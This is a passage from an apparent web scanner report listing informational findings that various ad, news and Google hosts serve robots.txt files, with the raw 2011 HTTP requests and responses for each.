xserver: www182
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.59. http://notredame-hospitality.cbscollegestore.com/store.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://notredame-hospitality.cbscollegestore.com
Path:	/store.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: notredame-hospitality.cbscollegestore.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:30 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 14:52:25 GMT
ETag: "49fadb-7b-48a1844cd5c40"
Accept-Ranges: bytes
Content-Length: 123
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cfc
Disallow: /cfide
Disallow: /include
Disallow: /scripts
Disallow: /css
Disallow: /maint

26.60. http://ocp.ncaa.com/adFunctions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ocp.ncaa.com
Path:	/adFunctions.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ocp.ncaa.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:08 GMT
Server: Apache/2.2
Last-Modified: Mon, 08 Aug 2011 20:38:19 GMT
Accept-Ranges: bytes
Content-Length: 3614
Keep-Alive: timeout=15, max=716
Connection: Keep-Alive
Content-Type: text/plain

# $Source: /cvs/main/ops/config/global/w/robots.txt,v $
# $Revision: 1.26 $
#
User-agent: *
Disallow: /Ads/
Disallow: /redir/
# Disallow: /i/ is removed per 190723
Disallow: /av/
Disallow: /css/
Disal
...[SNIP]...

26.61. http://odb.outbrain.com/utils/get previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/get

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: odb.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"30-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: text/plain
Content-Length: 30
Date: Sun, 04 Sep 2011 00:44:38 GMT
Connection: close

User-agent: *
Disallow: /

26.62. http://pagead2.googlesyndication.com/pagead/imgad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:05:20 GMT
Expires: Mon, 05 Sep 2011 01:05:20 GMT
Cache-Control: public, max-age=86400
Server: cafe
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

26.63. http://paid.outbrain.com/network/redir previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://paid.outbrain.com
Path:	/network/redir

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: paid.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"30-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: text/plain
Content-Length: 30
Date: Sun, 04 Sep 2011 01:23:11 GMT
Connection: close

User-agent: *
Disallow: /

26.64. http://pbid.pro-market.net/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pbid.pro-market.net
Path:	/crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pbid.pro-market.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: tapp2.ny
ETag: W/"27-1312809562000"
Last-Modified: Mon, 08 Aug 2011 13:19:22 GMT
Content-Type: text/plain
Content-Length: 27
Date: Sun, 04 Sep 2011 01:10:59 GMT
Connection: close

User-agent: *
Disallow: /

26.65. http://picasaweb.google.com/lh/view previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/lh/view

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: picasaweb.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:23:13 GMT
Expires: Sun, 04 Sep 2011 01:23:13 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Allow: /lh/albumList
Allow: /lh/album
Allow: /lh/favorites
Allow: /lh/idredir
Allow: /lh/photo
Allow: /lh/sredir
Disallow: /lh/

26.66. http://pixel.invitemedia.com/admeld_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 04 Sep 2011 01:05:06 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

26.67. http://pixel.quantserve.com/seg/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/seg/r

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 00:45:10 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 04 Sep 2011 00:45:10 GMT
Server: QS

User-agent: *
Disallow: /

26.68. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://premium.mookie1.com
Path:	/2/nbc.com/ac@Bottom3

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: premium.mookie1.com

Response

26.69. http://pubads.g.doubleclick.net/gampad/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/gampad/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:23:24 GMT
Expires: Mon, 05 Sep 2011 01:23:24 GMT
Cache-Control: public, max-age=86400
Server: cafe
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

26.70. http://r.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 01:06:00 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

26.71. http://rd.rlcdn.com/rd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rd.rlcdn.com
Path:	/rd

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rd.rlcdn.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 26
Last-Modified: Fri, 02 Sep 2011 17:41:18 GMT

User-Agent: *
Disallow: /

26.72. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rt.legolas-media.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:45 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 17:46:27 GMT
ETag: "38100-1b-4a79269af42c0"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.73. http://rtq.careerbuilder.com/RTQ/jobstream.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rtq.careerbuilder.com
Path:	/RTQ/jobstream.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rtq.careerbuilder.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Tue, 16 Aug 2011 11:16:02 GMT
Accept-Ranges: bytes
ETag: "94b831e255ccc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: REBEL32
Date: Sun, 04 Sep 2011 00:57:57 GMT
Connection: close
Content-Length: 10018

User-agent: Mediapartners-Google*
Disallow:

User-agent: Google*
Disallow: /Custom/
Disallow: /custom/
Disallow: /Partner/
Disallow: /partner/
Disallow: /PSA/
Disallow: /psa/
Disallow: /RTQ
...[SNIP]...

26.74. http://s0.2mdn.net/1181183/espn_cfb_728x90_sn_main.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/1181183/espn_cfb_728x90_sn_main.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 00:44:46 GMT
Expires: Mon, 05 Sep 2011 00:44:46 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /

26.75. http://sacramentoconnect.sacbee.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sacramentoconnect.sacbee.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sacramentoconnect.sacbee.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:23:34 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: W3 Total Cache/0.9.2.3
Set-Cookie: wpmp_switcher=desktop; expires=Mon, 03-Sep-2012 01:23:35 GMT; path=/
X-Pingback: http://sacramentoconnect.sacbee.com/wordpress/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.4
Cache-Control: max-age=3600
Expires: Sun, 04 Sep 2011 02:23:34 GMT
Vary: User-Agent
Content-Length: 85
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://sacramentoconnect.sacbee.com/sitemap.xml.gz

26.76. http://safebrowsing.clients.google.com/safebrowsing/gethash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://safebrowsing.clients.google.com
Path:	/safebrowsing/gethash

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 01:23:41 GMT
Expires: Sun, 04 Sep 2011 01:23:41 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.77. http://scholar.google.com/scholar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scholar.google.com
Path:	/scholar

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: scholar.google.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:23:43 GMT
Expires: Mon, 05 Sep 2011 01:23:43 GMT
Cache-Control: public, max-age=86400
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 19:25:15 GMT
X-Content-Type-Options: nosniff
Server: scholar
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.78. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.barnesandnoble.com
Path:	/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.barnesandnoble.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
P3P: CP="CAO DSP COR ADM DEV TAI PSA IVDo CONo HIS TELo DEL SAMo UNRo LEG PRE"
X-Powered-By: ASP.NET
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 06 May 2011 20:47:43 GMT
ETag: "1264b4d82eccc1:1010"
Content-Length: 194
Cache-Control: max-age=64766
Expires: Sun, 04 Sep 2011 19:23:09 GMT
Date: Sun, 04 Sep 2011 01:23:43 GMT
Connection: close

# search

User-agent: *
Disallow: /booksearch/pfp.asp
Disallow: /booksearch/store.asp
Disallow: /booksearch/imageviewer.asp
Disallow: /reviews/reviews.asp
Disallow: /used/product.asp

26.79. http://search.charlotteobserver.com/search-bin/search.pl.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.charlotteobserver.com
Path:	/search-bin/search.pl.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.charlotteobserver.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:23:45 GMT
Server: Apache/1.3.41
Vary: Accept-Encoding
Last-Modified: Mon, 12 Jul 2010 21:15:00 GMT
ETag: "192f210-89-4c3b85d4"
Accept-Ranges: bytes
Content-Length: 137
Content-Type: text/plain
Connection: close

User-Agent: *
Allow: /

Sitemap: http://www.charlotteobserver.com/sitemap.xml
Sitemap: http://www.charlotteobserver.com/news_sitemap.xml

26.80. http://search.spotxchange.com/partner previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.spotxchange.com
Path:	/partner

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.spotxchange.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:46 GMT
Server: Apache
Last-Modified: Mon, 28 Feb 2011 23:42:39 GMT
ETag: "5b017b-406a-4d6c32ef"
Accept-Ranges: bytes
Content-Length: 16490
Connection: close
Content-Type: text/plain

#
# IAB_ABCe_International_Spiders_and_Robots_200612
#
# December 20, 2006
#
# **********COMMENTS SECTION***************************************************
#
# This list has been reviewed by the IAB
...[SNIP]...

26.81. http://search2.sacbee.com/search-bin/search.pl.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search2.sacbee.com
Path:	/search-bin/search.pl.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search2.sacbee.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:23:50 GMT
Server: Apache/1.3.41
Vary: Accept-Encoding
Last-Modified: Mon, 12 Jul 2010 21:19:37 GMT
ETag: "13e0dcb-3bb-4c3b86e9"
Accept-Ranges: bytes
Content-Length: 955
Content-Type: text/plain
Connection: close

# update log
# 2009-08-26 - kparker @ MI 727-7946968 added, then removed 1198 and newhomes.
# 209-01-29 - pbuckley @ MI added sitemap2 and sitemap3
# 2008-07-23 - pbuckley @ MI
# 2007/03/05 - rwm

Us
...[SNIP]...

26.82. http://shlinks.industrybrains.com/sh previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shlinks.industrybrains.com
Path:	/sh

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: shlinks.industrybrains.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:23:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/plain
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 04 Sep 2011 01:23:53 GMT
Content-Length: 26

User-agent: *
Disallow: /

26.83. http://shop2.sprint.com/assets/olsvideo/mediaPlayer.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop2.sprint.com
Path:	/assets/olsvideo/mediaPlayer.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: shop2.sprint.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 01:23:55 GMT
Content-type: text/plain
Last-modified: Sat, 14 Mar 2009 10:44:56 GMT
Content-length: 148
Etag: "94-49bb8aa8"
Accept-ranges: bytes
Connection: close

#
# robots.txt for
#
# Dynamic Apps
User-agent: *
Disallow: /NASApp/registration
Disallow: /wps/
User-agent: nol-Ultraseek
Disallow: /wps/

26.84. http://shopping.sacbee.com/ROP/Subcat.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shopping.sacbee.com
Path:	/ROP/Subcat.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: shopping.sacbee.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 25 Mar 2010 20:28:57 GMT
Accept-Ranges: bytes
ETag: "5d30cacb59ccca1:0"
Server: Microsoft-IIS/7.5
X-Server-Name: HW3
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:23:54 GMT
Connection: close
Content-Length: 2166

User-agent: *
Disallow: /shared/AddShoppingList.aspx
Disallow: /shared/ViewShoppingList.aspx
Disallow: /shared/popup.aspx
Disallow: /shared/EmailAFreind.aspx
Disallow: /shared/FeedbackForm.aspx

...[SNIP]...

26.85. http://simg.zedo.com/speed-test/10k.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://simg.zedo.com
Path:	/speed-test/10k.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: simg.zedo.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:05:11 GMT
ETag: "37c4e0-4c-3f861aa21f400"
Last-Modified: Tue, 31 May 2005 07:08:00 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Server: ECS (sjo/5238)
X-Cache: HIT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

26.86. https://sites.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sites.google.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sites.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:24:02 GMT
Expires: Sun, 04 Sep 2011 01:24:02 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /feeds
Disallow: /*/_/

26.87. http://slashdot.org/bookmark.pl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://slashdot.org
Path:	/bookmark.pl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: slashdot.org

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
X-Powered-By: Slash 2.00500120110825.03
X-Fry: That's a chick show. I prefer programs of the genre: World's Blankiest Blank.
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Last-Modified: Wed, 20 Apr 2011 17:51:03 GMT
ETag: "15f42f-503-4daf1d07"
Content-Type: text/plain
Content-Length: 1283
Date: Sun, 04 Sep 2011 01:24:07 GMT
X-Varnish: 807280433
Age: 0
Connection: close

# robots.txt for Slashdot.org
# $Id$
# "Any empty [Disallow] value, indicates that all URLs can be retrieved.
# At least one Disallow field needs to be present in a record."

User-agent: Mediapartners
...[SNIP]...

26.88. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sprint.tt.omtrdc.net
Path:	/m2/sprint/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sprint.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:45:31 GMT
Accept-Ranges: bytes
ETag: W/"25-1309299047000"
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Content-Length: 25

User-agent: *
Disallow: /

26.89. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Date: Sun, 04 Sep 2011 01:12:40 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

26.90. http://store.cstv.com/marketplace/store.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://store.cstv.com
Path:	/marketplace/store.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: store.cstv.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:43 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 14:52:25 GMT
ETag: "49fadb-7b-48a1844cd5c40"
Accept-Ranges: bytes
Content-Length: 123
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cfc
Disallow: /cfide
Disallow: /include
Disallow: /scripts
Disallow: /css
Disallow: /maint

26.91. http://sync.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f47 32583
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

26.92. http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/js/741/mcclatchy/728x90/sacramento_sacbee

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Last-Modified: Wed, 31 Aug 2011 21:42:54 GMT
ETag: "5de0036-1a-4abd402b9f380"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:01:14 GMT
Connection: close

User-agent: *
Disallow: /

26.93. http://tcr.tynt.com/javascripts/Tracer.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tcr.tynt.com
Path:	/javascripts/Tracer.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/plain
Date: Sun, 04 Sep 2011 01:06:33 GMT
ETag: "3516526417"
Expires: Sun, 04 Sep 2011 01:36:33 GMT
Last-Modified: Wed, 11 Nov 2009 19:14:11 GMT
Server: ECS (sjo/5238)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 271
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
User-Agent: *
Disallow: /T
...[SNIP]...

26.94. http://traffic.outbrain.com/network/redir previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://traffic.outbrain.com
Path:	/network/redir

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: traffic.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"30-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: text/plain
Content-Length: 30
Date: Sun, 04 Sep 2011 01:24:37 GMT
Connection: close

User-agent: *
Disallow: /

26.95. http://translate.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: translate.google.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:24:38 GMT
Expires: Sun, 04 Sep 2011 01:24:38 GMT
Cache-Control: public, max-age=0
Content-Type: text/plain; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: HTTP server (unknown)
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /?q=
Disallow: /?text=
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
D
...[SNIP]...

26.96. http://trc.taboolasyndication.com/reuters/log/2/debug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trc.taboolasyndication.com
Path:	/reuters/log/2/debug

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: trc.taboolasyndication.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 00:50:48 GMT
Content-Type: text/plain
Content-Length: 65
Last-Modified: Thu, 25 Aug 2011 16:28:27 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: *
Disallow: /

User-agent: Adsbot-Google
Disallow: /

26.97. http://tu.connect.wunderloop.net/TU/1/1/1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tu.connect.wunderloop.net
Path:	/TU/1/1/1/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tu.connect.wunderloop.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:51 GMT
Server: Apache
Last-Modified: Mon, 13 Jun 2011 23:45:53 GMT
ETag: "1f48785-1a-4df6a131"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

26.98. http://twitter.com/home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/home

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:53 GMT
Server: Apache
Last-Modified: Mon, 29 Aug 2011 17:35:23 GMT
Accept-Ranges: bytes
Content-Length: 519
Cache-Control: max-age=86400
Expires: Mon, 05 Sep 2011 01:24:53 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/plain; charset=UTF-8

#Google Search Engine Robot
User-agent: Googlebot
# Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl
Allow: /*?*_escaped_fragment_
Disallow: /*?
Disallow: /*/with_friends

#Yahoo! Search Engine Ro
...[SNIP]...

26.99. http://und.cbscollegestore.com/store.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://und.cbscollegestore.com
Path:	/store.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: und.cbscollegestore.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:23 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 14:52:25 GMT
ETag: "49fadb-7b-48a1844cd5c40"
Accept-Ranges: bytes
Content-Length: 123
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cfc
Disallow: /cfide
Disallow: /include
Disallow: /scripts
Disallow: /css
Disallow: /maint

26.100. http://und.cstvauctions.com/auctiondisplay.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://und.cstvauctions.com
Path:	/auctiondisplay.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: und.cstvauctions.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:30 GMT
Server: Apache
Last-Modified: Mon, 28 Jun 2010 17:40:55 GMT
ETag: "26abfe-7b-48a1a9f67b7c0"
Accept-Ranges: bytes
Content-Length: 123
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cfc
Disallow: /cfide
Disallow: /include
Disallow: /scripts
Disallow: /css
Disallow: /maint

